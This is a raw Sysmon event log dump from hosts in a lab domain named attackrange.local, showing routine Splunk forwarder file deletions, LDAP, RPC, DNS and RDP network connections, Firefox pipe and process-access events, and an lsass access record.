07:59:02.707{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D86805F12F3F3010785F275C5183CC5,SHA256=4F802CE3DA5AE629588B15D417D72873E4BE69E921F3A60BC626A61D958D0C52,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:01.354{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57352-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:02.191{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BFFB5DFB77C9499161BFC1C0D990F9A,SHA256=6A900F37F43AE574BA40574CE07E550E30712DECC014152FAA783FA09D6A87DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.509{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-37235-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001051805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:02.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77334E5D64BE719D3B888CA9F74005B4,SHA256=2E808354CBCF8AFD80A47896152AAA08DB718B19535D9178694BAED8FF583E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:02.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6417BBC462E8736C31128766BE356338,SHA256=EB2773DB5ECFF545C2CE8942DDD9FF9B9AFFF9FE59A264920F445F2F53F4FC53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:03.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA05CCAFE838EC1859A990202057EFD,SHA256=D01D97DA4E75BE8B6271DBCECD2EA9F8B6D860E0E67220E2B4611A06C0B13842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:03.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C51DD248C502D05632F5FAFE28DBB18D,SHA256=F2EF0FC9ED87AA9B7A2193B9067FF8B655F1C3736543E26F6D0F63BA67FD22A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.740{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0B7E9D6FB62614F3C8871318F448E97,SHA256=5E4E0E735AD50FB27CC81975323CF79ABA4E2855FA0F4322EC0E05D776C6CDD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:04.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6118404AA84F3165E65BBA792DF6535A,SHA256=FFE0B9F44C6B23B2E17A71CE9BA563C85C69E85B716631CCC34A4BD7A7335450,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:05.759{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C37A6F3B0D4E7A1BAD1B320271FC0DB4,SHA256=8F2BEDEDF3DC7563AB428C196B912464DA89627A64657A3114F4E6848EFD6B7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:05.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E376113B9E79BBE0B55DAAC9B31589C0,SHA256=A537E5B10139B848F0851C6A9B4AB7F9D4A67DE93471BD5EABB4442C36DF2D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:06.765{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44BF5A541B9F292B93E1BA5A90008766,SHA256=7C5B3A019A9A74B093E4C485B618B56D0BC378ADD44648B8CEC773961492395A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:06.222{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E18CBD014F3F8679FB7C640F69186BC0,SHA256=169DA37A243B76BC4A97C2FB2BC10AED311765E369E81283098183E282E94315,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:06.348{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:06.292{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001051813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:06.292{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001051812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:59:06.292{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1215.197509028C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001051811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:59:06.292{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1215.197509028C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:07.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58077D3369A7C89F98A6D112D01541FE,SHA256=775494E748C4242A191A5FD809F88AE8733F34E97CDFB2F7E745E82052ACDC1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:07.238{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FA1274F49E9EE5C22EDD23747187E17,SHA256=B51D5C26085E9394C6971A9E4AD9CAFCC9B26659E1510D23E8C524CD5810C22F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:58.710{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51122-false10.0.1.12-8000- 23542300x80000000000000001051820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:08.769{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BE18DAF5D458A229FB3C8C3F2BA3939,SHA256=907440AC45457E57EDAE12A798DDB26DA7A60F689BCF4248CCCA2E6281AE4923,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:07.214{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57353-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:08.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00F5937374161A33AF8134F7F1A2E259,SHA256=D2CFAAD170BA1F59268D73FA068C72E6BCC729E6032841C4FFB9A28DA62E5C31,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:59.829{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local54060- 23542300x80000000000000001051822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:09.784{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA385241433F1FB5261F67F6D659FB0A,SHA256=FC7EE6AA6841F697870DF0002D6BBBC543E6BFD5771F33E64F8D6C6A382123FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:09.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ED539ADC28E53730A07E16AE091E289,SHA256=FF96D02554C14E9C021C011956A1954E0084403634AF8E192E87B2FF2CB9816C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:59.832{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59513- 23542300x80000000000000001051823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:10.799{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EC9D60D98A60887132165F500EC0A32,SHA256=5FD8A5FDDAA8748D0AD296E278BC7CB4F7E82CF5061EEC657D986D91796A368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:10.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B92B322289C34B8E14ED56B8D14429F5,SHA256=30C42E18A48C9CEA8CC3E86AF240163D2BB96A025099C77F08533664E2D4F30D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:11.316{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F908B32DBD3B83458947FDE22E0DC175,SHA256=693DAC4997942C843D67509D8EA565894A0068916CB344B45A0B2B146F0E0ADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:11.800{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35B0BFB33173018F98CFDA97A2009D2,SHA256=90C10905DC42C05DC548C30870F9A1B7F92158C8ACAF1DB06D762EDE58B9C966,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:11.253{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001051842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:12.814{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=380D8380E3EB3195A785FC57ED985404,SHA256=B1569097BD93B718536C94B52AA26D5C7E963F2CDB0351F474F1F112774B2F3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:12.363{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6814344F52CCD11EC4C516C90741571B,SHA256=338C3C5F5188ECEC9E4B3F598E61C44C498999D1E530EFCC3DDBBEFD75DE5E27,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.792{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51130-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001051840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.789{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51129-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001051839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.789{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51129-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001051838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.788{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51128-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001051837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.788{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51128-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001051836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.688{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local51127-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001051835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.688{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51127-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001051834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.682{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51126-false10.0.1.12-8000- 354300x80000000000000001051833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.670{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51125-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.670{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51125-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.670{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51124-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001051830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.670{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51124-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001051829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.668{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51123-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001051828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.668{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51123-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001051827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:12.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60940E08F13BD691933FA56FB3A83246,SHA256=7A7EA7800CA9ABAAC12222844AE0AB28DB1372066375FED2BD18ED3B11F0EB27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:12.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77334E5D64BE719D3B888CA9F74005B4,SHA256=2E808354CBCF8AFD80A47896152AAA08DB718B19535D9178694BAED8FF583E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:13.829{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 